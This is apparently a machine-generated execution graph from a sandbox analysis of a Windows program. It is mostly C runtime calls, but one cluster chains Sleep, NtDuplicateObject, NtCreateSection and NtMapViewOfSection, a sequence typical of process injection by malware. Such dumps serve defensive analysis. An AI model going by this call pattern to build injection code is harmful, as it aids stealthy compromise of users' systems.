                                                                                                                                    execution_graph 13264 40dac6 13266 40dad2 _realloc 13264->13266 13265 40dbd4 _realloc 13266->13265 13267 40daea 13266->13267 13269 40989a _realloc 3 API calls 13266->13269 13268 40daf8 13267->13268 13270 40989a _realloc 3 API calls 13267->13270 13271 40db06 13268->13271 13272 40989a _realloc 3 API calls 13268->13272 13269->13267 13270->13268 13273 40db14 13271->13273 13274 40989a _realloc 3 API calls 13271->13274 13272->13271 13275 40db22 13273->13275 13277 40989a _realloc 3 API calls 13273->13277 13274->13273 13276 40db30 13275->13276 13278 40989a _realloc 3 API calls 13275->13278 13279 40db3e 13276->13279 13280 40989a _realloc 3 API calls 13276->13280 13277->13275 13278->13276 13281 40db4f 13279->13281 13282 40989a _realloc 3 API calls 13279->13282 13280->13279 13283 40dfbf __lock 3 API calls 13281->13283 13282->13281 13286 40db57 13283->13286 13284 40db7c __freefls@4 13285 40dfbf __lock 3 API calls 13284->13285 13290 40db90 ___removelocaleref 13285->13290 13286->13284 13287 40989a _realloc 3 API calls 13286->13287 13287->13284 13288 40dbc1 __freefls@4 13289 40989a _realloc 3 API calls 13288->13289 13289->13265 13290->13288 13291 40b3b7 ___freetlocinfo 3 API calls 13290->13291 13291->13288 12817 40a0c7 12818 40a0d6 12817->12818 12819 40a0dc 12817->12819 12820 40ff55 _raise 3 API calls 12818->12820 12823 40ff7a 12819->12823 12820->12819 12822 40a0e1 _realloc 12824 40fe13 _doexit 3 API calls 12823->12824 12825 40ff85 12824->12825 12825->12822 12195 409448 12198 40d00e 12195->12198 12199 40daac __getptd 3 API calls 12198->12199 12200 40d01b 12199->12200 12201 40d05f 12200->12201 12202 40946e 12200->12202 12203 40d082 12200->12203 12201->12202 12206 40c520 12201->12206 12203->12202 12216 40ccaa 12203->12216 12207 40c52c _realloc 12206->12207 12208 40daac __getptd 3 API calls 12207->12208 12213 40c54c __CallSettingFrame@12 12208->12213 12209 40c5c1 12257 40c5e6 12209->12257 12213->12209 12253 409d23 12213->12253 12214 40c5d7 _realloc 12214->12202 12215 409d23 CallUnexpected 3 API calls 12215->12214 12217 40ccc9 12216->12217 12218 409d23 CallUnexpected 3 API calls 12217->12218 12219 40cce3 12217->12219 12218->12219 12225 40daac __getptd 3 API calls 12219->12225 12250 40cdbe FindHandler type_info::operator== __CxxThrowException@8 _UnwindNestedFrames ___TypeMatch 12219->12250 12220 40cfbd 12337 40cbb6 12220->12337 12221 40daac __getptd 3 API calls 12224 40cfde 12221->12224 12222 409cd7 CallUnexpected 3 API calls 12222->12250 12227 40cfec 12224->12227 12229 409d23 CallUnexpected 3 API calls 12224->12229 12228 40cd2a 12225->12228 12226 40cfd6 12226->12221 12227->12202 12228->12227 12231 40daac __getptd 3 API calls 12228->12231 12229->12227 12233 40cd3c 12231->12233 12234 40daac __getptd 3 API calls 12233->12234 12236 40cd4a ___BuildCatchObjectHelper 12234->12236 12235 40c6d7 IsInExceptionSpec 3 API calls 12235->12250 12237 409d23 CallUnexpected 3 API calls 12236->12237 12240 40cd66 12236->12240 12237->12240 12238 40cd90 12239 40daac __getptd 3 API calls 12238->12239 12241 40cd95 12239->12241 12240->12238 12244 409d23 CallUnexpected 3 API calls 12240->12244 12245 40daac __getptd 3 API calls 12241->12245 12241->12250 12243 40daac RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __getptd 12243->12250 12244->12238 12246 40cda3 12245->12246 12247 40daac __getptd 3 API calls 12246->12247 12248 40cdae 12247->12248 12304 40c6d7 12248->12304 12250->12220 12250->12222 12250->12226 12250->12235 12250->12243 12251 40c520 FindHandler 3 API calls 12250->12251 12310 40c428 12250->12310 12313 409627 12250->12313 12319 40cb48 12250->12319 12327 40c752 12250->12327 12251->12250 12254 409d2f __decode_pointer _realloc 12253->12254 12262 409cd7 12254->12262 12256 409d5a 12258 40daac __getptd 3 API calls 12257->12258 12259 40c5eb 12258->12259 12260 40c5cd 12259->12260 12261 40daac __getptd 3 API calls 12259->12261 12260->12214 12260->12215 12261->12260 12263 409ce3 _realloc 12262->12263 12264 40daac __getptd 3 API calls 12263->12264 12267 409ce8 12264->12267 12266 409d0a _realloc 12266->12256 12268 409d6c 12267->12268 12269 409d8b 12268->12269 12271 409d92 _abort 12268->12271 12270 4101e9 __NMSG_WRITE 3 API calls 12269->12270 12270->12271 12274 409da3 _memset 12271->12274 12279 410039 12271->12279 12293 40ff55 12274->12293 12276 409eb2 12276->12266 12286 410045 _realloc 12279->12286 12280 4100a1 12283 4100b0 12280->12283 12284 410071 _siglookup __decode_pointer 12280->12284 12281 41006c 12282 40da33 __getptd_noexit 3 API calls 12281->12282 12282->12284 12285 40b118 _realloc 3 API calls 12283->12285 12287 410117 12284->12287 12288 40ff55 _raise 3 API calls 12284->12288 12292 41007a strtoxl _raise _realloc 12284->12292 12285->12292 12286->12280 12286->12281 12286->12283 12286->12284 12289 40dfbf __lock 3 API calls 12287->12289 12291 410122 12287->12291 12288->12287 12289->12291 12290 40d857 _doexit RtlEncodePointer 12290->12292 12291->12290 12291->12292 12292->12274 12294 40fe13 _doexit 3 API calls 12293->12294 12295 409e82 12294->12295 12295->12276 12296 40b13e 12295->12296 12301 40b12b 12296->12301 12298 40b149 _realloc 12299 40b118 _realloc 3 API calls 12298->12299 12300 409eac 12299->12300 12300->12266 12302 40da33 __getptd_noexit 3 API calls 12301->12302 12303 40b130 12302->12303 12303->12298 12305 40c6e3 12304->12305 12309 40c6ed ___TypeMatch 12304->12309 12306 409d23 CallUnexpected 3 API calls 12305->12306 12307 40c6e8 12306->12307 12308 409cd7 CallUnexpected 3 API calls 12307->12308 12308->12309 12309->12250 12353 4090cf 12310->12353 12314 409640 12313->12314 12315 409676 12314->12315 12316 409d23 CallUnexpected 3 API calls 12314->12316 12317 40968f 12315->12317 12318 409d23 CallUnexpected 3 API calls 12315->12318 12316->12314 12317->12250 12318->12317 12320 40cb53 12319->12320 12322 40cb60 _UnwindNestedFrames 12319->12322 12359 40cab6 12320->12359 12323 40c520 FindHandler 3 API calls 12322->12323 12324 40cb85 12323->12324 12363 40c79b 12324->12363 12326 40cba6 FindHandlerForForeignException 12326->12250 12328 40c75e __EH_prolog3_catch 12327->12328 12329 40daac __getptd 3 API calls 12328->12329 12330 40c763 12329->12330 12331 40c771 12330->12331 12332 409d23 CallUnexpected 3 API calls 12330->12332 12333 409cd7 CallUnexpected 3 API calls 12331->12333 12332->12331 12334 40c783 12333->12334 12335 40daac __getptd 3 API calls 12334->12335 12336 40c788 __CxxThrowException@8 12335->12336 12338 40cbcd 12337->12338 12348 40cca5 12337->12348 12339 40daac __getptd 3 API calls 12338->12339 12340 40cbd3 12339->12340 12342 40daac __getptd 3 API calls 12340->12342 12350 40cc10 12340->12350 12341 40cc29 12344 409627 _GetRangeOfTrysToCheck 3 API calls 12341->12344 12345 40cbe1 12342->12345 12343 409d23 CallUnexpected 3 API calls 12343->12341 12351 40cc3e 12344->12351 12346 40d857 _doexit RtlEncodePointer 12345->12346 12347 40cbec 12346->12347 12347->12350 12397 4094b1 12347->12397 12348->12226 12350->12341 12350->12343 12350->12348 12351->12348 12352 40cb48 FindHandlerForForeignException 3 API calls 12351->12352 12352->12351 12354 4090e8 _strlen 12353->12354 12355 409109 12353->12355 12356 40d2b2 _malloc 3 API calls 12354->12356 12355->12250 12357 4090f7 12356->12357 12357->12355 12358 40d1fb _strcpy_s 3 API calls 12357->12358 12358->12355 12360 40cac2 _realloc 12359->12360 12377 40c937 12360->12377 12362 40caf1 ___BuildCatchObject _realloc 12362->12322 12364 40c7a7 _realloc 12363->12364 12381 40969c 12364->12381 12367 40daac __getptd 3 API calls 12368 40c7d2 12367->12368 12369 40daac __getptd 3 API calls 12368->12369 12370 40c7e0 12369->12370 12371 40daac __getptd 3 API calls 12370->12371 12372 40c7ee 12371->12372 12373 40daac __getptd 3 API calls 12372->12373 12374 40c7f9 FindHandlerForForeignException 12373->12374 12386 40c8c1 12374->12386 12376 40c8ad _realloc 12376->12326 12378 40c943 _realloc ___BuildCatchObjectHelper 12377->12378 12379 409d23 CallUnexpected 3 API calls 12378->12379 12380 40c9b0 ___BuildCatchObject _realloc 12378->12380 12379->12380 12380->12362 12382 40daac __getptd 3 API calls 12381->12382 12383 4096af 12382->12383 12384 40daac __getptd 3 API calls 12383->12384 12385 4096bd 12384->12385 12385->12367 12387 40c8cf 12386->12387 12388 40daac __getptd 3 API calls 12387->12388 12389 40c8d5 12388->12389 12390 40daac __getptd 3 API calls 12389->12390 12392 40c8e3 12390->12392 12391 40c926 FindHandler 12391->12376 12392->12391 12394 4096c8 12392->12394 12395 40daac __getptd 3 API calls 12394->12395 12396 4096d2 12395->12396 12396->12391 12398 4094d5 12397->12398 12400 4094c3 12397->12400 12399 40daac __getptd 3 API calls 12398->12399 12399->12400 12400->12350 13532 40fbc9 13535 40fb41 13532->13535 13534 40fbe7 13536 40fbad 13535->13536 13537 40fb4e 13535->13537 13583 40f432 13536->13583 13537->13536 13539 40fb53 13537->13539 13540 40fb71 13539->13540 13541 40fb58 13539->13541 13544 40fb94 13540->13544 13546 40fb7b 13540->13546 13549 40f98c 13541->13549 13542 40fb92 13542->13534 13572 40f522 13544->13572 13545 40fb6c 13545->13534 13559 40fa47 13546->13559 13593 4180aa 13549->13593 13551 40f9bd 13552 40f9c6 13551->13552 13554 40f9e5 13551->13554 13553 40b118 _realloc 3 API calls 13552->13553 13557 40f9cb strtoxl ___strgtold12_l 13553->13557 13597 417f2e 13554->13597 13556 40fa18 13556->13557 13604 40f895 13556->13604 13557->13545 13560 4180aa __fltout2 3 API calls 13559->13560 13561 40fa78 13560->13561 13562 40fa81 13561->13562 13564 40faa3 13561->13564 13563 40b118 _realloc 3 API calls 13562->13563 13566 40fa86 strtoxl ___strgtold12_l 13563->13566 13565 417f2e __fptostr 3 API calls 13564->13565 13568 40facf 13565->13568 13566->13542 13567 40fb16 13609 40f2c3 13567->13609 13568->13566 13568->13567 13569 40faee 13568->13569 13571 40f895 __cftof2_l 3 API calls 13569->13571 13571->13566 13573 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 13572->13573 13574 40f547 13573->13574 13575 40f556 13574->13575 13576 40f586 13574->13576 13577 40b118 _realloc 3 API calls 13575->13577 13578 40f594 13576->13578 13581 40f59d 13576->13581 13579 40f55b _memset __alldvrm strtoxl __cftoa_l _strrchr 13577->13579 13580 40b118 _realloc 3 API calls 13578->13580 13579->13542 13580->13579 13581->13579 13620 40f502 13581->13620 13584 4180aa __fltout2 3 API calls 13583->13584 13585 40f463 13584->13585 13586 40f46c 13585->13586 13588 40f48b 13585->13588 13587 40b118 _realloc 3 API calls 13586->13587 13591 40f471 strtoxl ___strgtold12_l 13587->13591 13589 417f2e __fptostr 3 API calls 13588->13589 13590 40f4cf 13589->13590 13590->13591 13592 40f2c3 __cftoe2_l 3 API calls 13590->13592 13591->13542 13592->13591 13594 4180d5 ___dtold 13593->13594 13595 40d1fb _strcpy_s 3 API calls 13594->13595 13596 418110 __invoke_watson ___strgtold12_l 13595->13596 13596->13551 13598 417f63 13597->13598 13599 417f45 13597->13599 13598->13599 13601 417f68 13598->13601 13600 40b118 _realloc 3 API calls 13599->13600 13603 417f4a strtoxl _strlen 13600->13603 13602 40b118 _realloc 3 API calls 13601->13602 13601->13603 13602->13603 13603->13556 13605 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 13604->13605 13606 40f8b3 13605->13606 13607 40b118 _realloc 3 API calls 13606->13607 13608 40f8bc _memset strtoxl __shift 13606->13608 13607->13608 13608->13557 13610 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 13609->13610 13611 40f2db 13610->13611 13612 40f2e1 13611->13612 13613 40f311 13611->13613 13614 40b118 _realloc 3 API calls 13612->13614 13615 40f325 13613->13615 13617 40f32e __shift 13613->13617 13619 40f2e6 __invoke_watson strtoxl 13614->13619 13616 40b118 _realloc 3 API calls 13615->13616 13616->13619 13618 40d1fb _strcpy_s 3 API calls 13617->13618 13618->13619 13619->13566 13621 40f432 __cftoe_l 3 API calls 13620->13621 13622 40f51d 13621->13622 13622->13579 12401 40c44a 12404 40919c 12401->12404 12403 40c464 12405 4091b0 12404->12405 12406 4091a8 12404->12406 12405->12403 12407 40989a _realloc 3 API calls 12406->12407 12407->12405 12408 40a84c 12409 40a884 12408->12409 12414 40ab6d ___strgtold12_l 12408->12414 12410 40a8a0 12409->12410 12447 412a30 12409->12447 12412 40afa5 __malloc_crt 3 API calls 12410->12412 12415 40ab72 12410->12415 12413 40a8b2 12412->12413 12416 40afea __calloc_crt 3 API calls 12413->12416 12418 40989a _realloc 3 API calls 12415->12418 12417 40a8c2 12416->12417 12419 40afea __calloc_crt 3 API calls 12417->12419 12420 40ab7a 12418->12420 12421 40a8cd 12419->12421 12422 40989a _realloc 3 API calls 12420->12422 12423 40afea __calloc_crt 3 API calls 12421->12423 12424 40ab82 12422->12424 12426 40a8d8 12423->12426 12425 40989a _realloc 3 API calls 12424->12425 12427 40ab8a 12425->12427 12428 40afea __calloc_crt 3 API calls 12426->12428 12429 40989a _realloc 3 API calls 12427->12429 12434 40a8e7 12428->12434 12446 40ab26 12429->12446 12430 40989a _realloc 3 API calls 12430->12414 12431 4129ee ___crtGetStringTypeA 3 API calls 12432 40a9a7 12431->12432 12432->12415 12433 40a55c ___crtLCMapStringA 4 API calls 12432->12433 12435 40a9da 12433->12435 12434->12415 12434->12431 12435->12415 12436 40a55c ___crtLCMapStringA 4 API calls 12435->12436 12437 40aa07 12436->12437 12437->12415 12438 40aa12 _realloc 12437->12438 12439 40989a _realloc 3 API calls 12438->12439 12438->12446 12440 40aafa 12439->12440 12441 40989a _realloc 3 API calls 12440->12441 12442 40ab0d 12441->12442 12443 40989a _realloc 3 API calls 12442->12443 12444 40ab1b 12443->12444 12445 40989a _realloc 3 API calls 12444->12445 12445->12446 12446->12430 12448 412b64 12447->12448 12449 412a66 12447->12449 12453 412b1e ___strgtold12_l 12448->12453 12475 418ad3 12448->12475 12470 418c46 12449->12470 12452 412b7e 12452->12453 12478 40a719 12452->12478 12453->12410 12454 40afea __calloc_crt 3 API calls 12455 412b02 12454->12455 12458 412b31 12455->12458 12459 412b10 12455->12459 12461 413e88 __NMSG_WRITE 3 API calls 12458->12461 12459->12453 12462 40989a _realloc 3 API calls 12459->12462 12460 418c46 ___crtGetLocaleInfoA 3 API calls 12463 412ab3 12460->12463 12464 412b3d __invoke_watson 12461->12464 12462->12453 12463->12453 12465 40afea __calloc_crt 3 API calls 12463->12465 12464->12453 12467 40989a _realloc 3 API calls 12464->12467 12466 412aca 12465->12466 12466->12453 12468 418c46 ___crtGetLocaleInfoA 3 API calls 12466->12468 12467->12453 12469 412af1 12468->12469 12469->12454 12469->12459 12471 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 12470->12471 12472 418c59 12471->12472 12483 418b07 12472->12483 12474 412a87 12474->12453 12474->12460 12474->12469 12476 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 12475->12476 12477 418ae6 12476->12477 12477->12452 12479 40a727 12478->12479 12480 40a739 12478->12480 12479->12452 12489 40a6c8 12480->12489 12484 418b2f 12483->12484 12485 418b93 ___strgtold12_l 12484->12485 12486 40d2b2 _malloc 3 API calls 12484->12486 12488 418bb3 12484->12488 12485->12474 12486->12488 12487 40a110 __freea 3 API calls 12487->12485 12488->12485 12488->12487 12490 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 12489->12490 12491 40a6db 12490->12491 12492 41277c __isctype_l 3 API calls 12491->12492 12493 40a6f5 12491->12493 12492->12493 12493->12452 12494 41704c 12495 41705d 12494->12495 12496 417063 12495->12496 12497 40b118 _realloc 3 API calls 12495->12497 12498 416ff3 RtlAllocateHeap RtlEncodePointer RtlAllocateHeap _write_multi_char 12495->12498 12497->12495 12498->12495 13147 41064c 13148 4106c6 13147->13148 13149 4106a6 13147->13149 13148->13149 13150 4106ca 13148->13150 13151 40b118 _realloc 3 API calls 13149->13151 13152 41074b 13150->13152 13153 416dd7 __fileno 3 API calls 13150->13153 13159 4106ab strtoxl ___strgtold12_l 13151->13159 13154 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 13152->13154 13156 4106d7 13153->13156 13177 410759 _memset __input_l __decode_pointer 13154->13177 13155 40a81e RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __input_l 13155->13177 13156->13152 13157 41072b 13156->13157 13158 40b118 _realloc 3 API calls 13157->13158 13158->13159 13160 410622 RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __whiteout 13160->13177 13161 40a719 RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __hextodec 13161->13177 13162 41156f 13186 41060f 13162->13186 13163 416fe0 RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __write_nolock 13163->13177 13165 41156d 13165->13159 13167 40989a _realloc 3 API calls 13165->13167 13166 411588 13168 41060f __input_l 3 API calls 13166->13168 13167->13159 13169 41158f 13168->13169 13170 41060f __input_l 3 API calls 13169->13170 13170->13165 13171 41060f RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __input_l 13171->13177 13172 40a79d RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __input_l 13172->13177 13173 4105d9 RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __hextodec 13173->13177 13175 4105f9 RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __input_l 13175->13177 13176 410582 RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __input_l 13176->13177 13177->13155 13177->13159 13177->13160 13177->13161 13177->13162 13177->13163 13177->13165 13177->13166 13177->13171 13177->13172 13177->13173 13177->13175 13177->13176 13178 4188c5 13177->13178 13179 4188d8 13178->13179 13185 4188e1 13178->13185 13180 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 13179->13180 13179->13185 13181 4188fe 13180->13181 13182 416fa8 __isleadbyte_l 3 API calls 13181->13182 13181->13185 13183 418932 13182->13183 13184 40b118 _realloc 3 API calls 13183->13184 13183->13185 13184->13185 13185->13177 13187 410620 13186->13187 13188 41061a 13186->13188 13187->13165 13189 41885d 13188->13189 13190 416dd7 __fileno 3 API calls 13188->13190 13191 416d2a __getbuf 3 API calls 13189->13191 13195 418843 strtoxl 13189->13195 13194 4187ea 13190->13194 13191->13195 13192 41883e 13193 40b118 _realloc 3 API calls 13192->13193 13193->13195 13194->13189 13194->13192 13195->13165 11513 402bd0 11514 402bd2 11513->11514 11516 402c68 11514->11516 11517 401915 11514->11517 11518 401923 11517->11518 11519 40194a Sleep 11518->11519 11520 401965 11519->11520 11522 401976 11520->11522 11523 40156b 11520->11523 11522->11516 11524 401579 11523->11524 11525 4018d6 11524->11525 11526 401606 NtDuplicateObject 11524->11526 11525->11522 11526->11525 11527 401623 NtCreateSection 11526->11527 11528 4016a3 NtCreateSection 11527->11528 11529 401649 NtMapViewOfSection 11527->11529 11528->11525 11531 4016cf 11528->11531 11529->11528 11530 40166c NtMapViewOfSection 11529->11530 11530->11528 11533 40168a 11530->11533 11531->11525 11532 4016d9 NtMapViewOfSection 11531->11532 11532->11525 11534 401700 NtMapViewOfSection 11532->11534 11533->11528 11534->11525 11535 401722 11534->11535 11535->11525 11537 401727 11535->11537 11538 4016cf 11537->11538 11541 401722 11537->11541 11539 4016d9 NtMapViewOfSection 11538->11539 11538->11541 11540 401700 NtMapViewOfSection 11539->11540 11539->11541 11540->11541 11541->11525 12499 40c451 12500 40c464 12499->12500 12501 40919c moneypunct 3 API calls 12499->12501 12501->12500 13627 4103d3 13628 4103e0 13627->13628 13629 40afea __calloc_crt 3 API calls 13628->13629 13630 4103fa 13629->13630 13631 410413 13630->13631 13632 40afea __calloc_crt 3 API calls 13630->13632 13632->13631 13491 40b755 13492 40b761 _realloc 13491->13492 13493 40b7f8 _realloc 13492->13493 13494 40dfbf __lock 3 API calls 13492->13494 13496 40b773 13494->13496 13495 40b79a __free_locale 13498 40dfbf __lock 3 API calls 13495->13498 13502 40b7db __free_locale 13495->13502 13496->13495 13499 40989a _realloc 3 API calls 13496->13499 13497 40989a _realloc 3 API calls 13497->13493 13500 40b7b3 ___removelocaleref 13498->13500 13499->13495 13501 40b3b7 ___freetlocinfo 3 API calls 13500->13501 13500->13502 13501->13502 13502->13497 11557 40d857 11560 40d7e5 11557->11560 11561 40d7f9 __crt_waiting_on_module_handle 11560->11561 11562 40d851 11561->11562 11563 40d849 RtlEncodePointer 11561->11563 11563->11562 13062 4091dd 13065 40913f 13062->13065 13066 40915f _strlen 13065->13066 13070 409185 13065->13070 13067 40d2b2 _malloc 3 API calls 13066->13067 13066->13070 13068 409172 13067->13068 13069 40d1fb _strcpy_s 3 API calls 13068->13069 13068->13070 13069->13070 13196 40925d 13199 40924d 13196->13199 13198 40926a 13202 40d37c 13199->13202 13201 40925b 13201->13198 13203 40d388 _realloc 13202->13203 13204 40dfbf __lock 3 API calls 13203->13204 13206 40d38f 13204->13206 13205 40d3bf 13207 40989a _realloc 3 API calls 13205->13207 13206->13205 13208 40d3c8 type_info::_Type_info_dtor _realloc 13206->13208 13209 40989a _realloc 3 API calls 13206->13209 13207->13208 13208->13201 13209->13205 13633 4097de 13636 4097e8 _realloc 13633->13636 13634 40d2b2 _malloc 3 API calls 13634->13636 13635 409802 13636->13634 13636->13635 13637 409804 std::bad_alloc::bad_alloc 13636->13637 13638 40b288 __cinit 3 API calls 13637->13638 13639 40982a __CxxThrowException@8 13637->13639 13638->13639 13071 418de3 13072 418df9 13071->13072 13080 418e0e strtoxl ___ascii_strnicmp 13071->13080 13073 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 13072->13073 13074 418e04 13073->13074 13075 418e09 13074->13075 13077 418e3e 13074->13077 13076 40b118 _realloc 3 API calls 13075->13076 13076->13080 13078 418e48 13077->13078 13082 418e70 13077->13082 13079 40b118 _realloc 3 API calls 13078->13079 13079->13080 13081 417c9d LCMapStringW RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __tolower_l 13081->13082 13082->13080 13082->13081 13210 40f264 13213 40f222 13210->13213 13214 40f235 13213->13214 13215 40f24e 13213->13215 13219 417dde 13214->13219 13224 417e86 13215->13224 13218 40f23e 13220 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 13219->13220 13221 417e04 13220->13221 13229 419e9e 13221->13229 13223 417e1c __ld12tod ___strgtold12_l 13223->13218 13225 40a130 _LocaleUpdate::_LocaleUpdate 3 API calls 13224->13225 13226 417eac 13225->13226 13227 419e9e ___strgtold12_l 3 API calls 13226->13227 13228 417ec4 __ld12tod ___strgtold12_l 13227->13228 13228->13218 13230 419ee9 13229->13230 13232 419eee ___mtold12 strtoxl ___strgtold12_l 13229->13232 13231 40b118 _realloc 3 API calls 13230->13231 13231->13232 13232->13223 12837 4138f3 12838 41390e 12837->12838 12839 40afea __calloc_crt 3 API calls 12838->12839 12842 413913 12838->12842 12840 41392e 12839->12840 12841 40afa5 __malloc_crt 3 API calls 12840->12841 12848 413939 12840->12848 12843 413953 12841->12843 12847 40989a _realloc 3 API calls 12842->12847 12842->12848 12844 413968 12843->12844 12845 41395d 12843->12845 12844->12842 12849 40afa5 __malloc_crt 3 API calls 12844->12849 12846 40989a _realloc 3 API calls 12845->12846 12846->12848 12850 413a8e 12847->12850 12851 41397a 12849->12851 12852 40989a _realloc 3 API calls 12850->12852 12853 412a30 ___getlocaleinfo 3 API calls 12851->12853 12864 413982 12851->12864 12852->12848 12854 4139b6 12853->12854 12856 412a30 ___getlocaleinfo 3 API calls 12854->12856 12855 40989a _realloc 3 API calls 12857 41398d 12855->12857 12859 4139cb 12856->12859 12858 40989a _realloc 3 API calls 12857->12858 12858->12848 12860 412a30 ___getlocaleinfo 3 API calls 12859->12860 12861 4139e3 12860->12861 12861->12842 12862 4139eb 12861->12862 12863 4138ae ___free_lconv_num 3 API calls 12862->12863 12863->12864 12864->12855 12502 409073 12503 409081 12502->12503 12504 409087 12502->12504 12505 4101e9 __NMSG_WRITE 3 API calls 12503->12505 12506 409d92 _abort 12503->12506 12505->12506 12507 410039 _raise 3 API calls 12506->12507 12509 409da3 _memset 12506->12509 12507->12509 12508 40ff55 _raise 3 API calls 12510 409e82 12508->12510 12509->12508 12511 409eb2 12510->12511 12512 40b13e __dosmaperr 3 API calls 12510->12512 12513 409eac 12512->12513 13008 401577 13009 401585 13008->13009 13010 401606 NtDuplicateObject 13009->13010 13014 4018d6 13009->13014 13011 401623 NtCreateSection 13010->13011 13010->13014 13012 4016a3 NtCreateSection 13011->13012 13013 401649 NtMapViewOfSection 13011->13013 13012->13014 13016 4016cf 13012->13016 13013->13012 13015 40166c NtMapViewOfSection 13013->13015 13015->13012 13018 40168a 13015->13018 13016->13014 13017 4016d9 NtMapViewOfSection 13016->13017 13017->13014 13019 401700 NtMapViewOfSection 13017->13019 13018->13012 13019->13014 13020 401722 13019->13020 13020->13014 13021 401727 2 API calls 13020->13021 13021->13014 12514 40947e 12515 409492 ___strgtold12_l 12514->12515 12516 40d00e ___InternalCxxFrameHandler 3 API calls 12515->12516 12517 4094ab 12516->12517 12518 409000 12519 40989a _realloc 3 API calls 12518->12519 12520 409009 12519->12520 13648 402b81 13649 402b8c 13648->13649 13650 401915 10 API calls 13649->13650 13651 402c68 13649->13651 13650->13651 12869 410484 12876 4186a0 12869->12876 12872 410497 12874 40989a _realloc 3 API calls 12872->12874 12875 4104a2 12874->12875 12886 4185c6 12876->12886 12878 410489 12878->12872 12879 418477 12878->12879 12880 418483 _realloc 12879->12880 12881 40dfbf __lock 3 API calls 12880->12881 12882 41848f 12881->12882 12883 4184f8 __fcloseall _realloc 12882->12883 12885 40989a _realloc 3 API calls 12882->12885 12898 41b36e 12882->12898 12883->12872 12885->12882 12887 4185d2 _realloc 12886->12887 12888 40dfbf __lock 3 API calls 12887->12888 12891 4185e1 _flsall 12888->12891 12890 418679 _flsall _realloc 12890->12878 12891->12890 12892 41857e RtlAllocateHeap RtlEncodePointer RtlAllocateHeap __fflush_nolock 12891->12892 12893 4104e5 12891->12893 12892->12891 12894 4104f2 12893->12894 12895 410508 12893->12895 12896 40dfbf __lock 3 API calls 12894->12896 12895->12891 12897 4104fb 12896->12897 12897->12891 12899 41b37a _realloc 12898->12899 12900 41b3ab 12899->12900 12901 41b38e 12899->12901 12903 41b393 __fcloseall strtoxl _realloc 12900->12903 12907 4104a4 12900->12907 12902 40b118 _realloc 3 API calls 12901->12902 12902->12903 12903->12882 12908 4104b6 12907->12908 12909 4104ce 12907->12909 12908->12909 12910 40dfbf __lock 3 API calls 12908->12910 12911 41b2f7 12909->12911 12910->12909 12912 41b327 12911->12912 12913 41b30b 12911->12913 12924 41b310 strtoxl 12912->12924 12925 418516 12912->12925 12914 40b118 _realloc 3 API calls 12913->12914 12914->12924 12919 416dd7 __fileno 3 API calls 12920 41b341 12919->12920 12935 41bf19 12920->12935 12922 41b347 12923 40989a _realloc 3 API calls 12922->12923 12922->12924 12923->12924 12924->12903 12926 41852f 12925->12926 12930 418551 12925->12930 12927 416dd7 __fileno 3 API calls 12926->12927 12926->12930 12928 41854a 12927->12928 12929 416c4e __locking 3 API calls 12928->12929 12929->12930 12931 41bfe6 12930->12931 12932 41b33b 12931->12932 12933 41bff6 12931->12933 12932->12919 12933->12932 12934 40989a _realloc 3 API calls 12933->12934 12934->12932 12936 41bf25 _realloc 12935->12936 12937 41bf48 12936->12937 12938 41bf2d 12936->12938 12940 41bf56 12937->12940 12943 41bf97 12937->12943 12939 40b12b __write_nolock 3 API calls 12938->12939 12941 41bf32 12939->12941 12942 40b12b __write_nolock 3 API calls 12940->12942 12944 40b118 _realloc 3 API calls 12941->12944 12945 41bf5b 12942->12945 12946 419030 ___lock_fhandle 3 API calls 12943->12946 12953 41bf3a strtoxl __close _realloc 12944->12953 12947 40b118 _realloc 3 API calls 12945->12947 12948 41bf9d 12946->12948 12947->12953 12949 41bfb8 12948->12949 12950 41bfaa 12948->12950 12952 40b118 _realloc 3 API calls 12949->12952 12954 41be7d 12950->12954 12952->12953 12953->12922 12955 418fb9 __close_nolock 3 API calls 12954->12955 12956 41be8d 12955->12956 12959 418fb9 __close_nolock 3 API calls 12956->12959 12965 41becd 12956->12965 12966 41bec1 12956->12966 12958 418fb9 __close_nolock 3 API calls 12958->12965 12961 41beb8 12959->12961 12963 418fb9 __close_nolock 3 API calls 12961->12963 12962 40b13e __dosmaperr 3 API calls 12964 41bf0d 12962->12964 12963->12966 12964->12953 12967 418f33 12965->12967 12966->12958 12966->12965 12968 418f44 12967->12968 12969 40b118 _realloc 3 API calls 12968->12969 12972 418f6f 12968->12972 12970 418fa4 12969->12970 12971 40b12b __write_nolock 3 API calls 12970->12971 12971->12972 12972->12962 12972->12964 13125 409588 13126 40959e ___strgtold12_l 13125->13126 13127 4095a9 13126->13127 13128 40d00e ___InternalCxxFrameHandler 3 API calls 13126->13128 13129 4095e1 _UnwindNestedFrames 13128->13129 13130 4094b1 _CallSETranslator 3 API calls 13129->13130 13130->13127 13236 411609 13237 411645 13236->13237 13239 41161b 13236->13239 13238 409cd7 CallUnexpected 3 API calls 13238->13237 13239->13237 13239->13238 12005 409f89 12006 409f95 _realloc 12005->12006 12037 40de13 HeapCreate 12006->12037 12009 40a008 12039 40dbf5 12009->12039 12013 40a019 __RTC_Initialize 12058 411b3a 12013->12058 12014 409f60 _fast_error_exit 3 API calls 12014->12013 12016 40a027 12017 40a032 12016->12017 12018 40fccf __amsg_exit 3 API calls 12016->12018 12064 411add 12017->12064 12018->12017 12020 40a042 12069 411a2f 12020->12069 12022 40a04c 12023 40a057 12022->12023 12024 40fccf __amsg_exit 3 API calls 12022->12024 12073 411800 12023->12073 12024->12023 12027 40a068 12084 40fd8e 12027->12084 12029 40fccf __amsg_exit 3 API calls 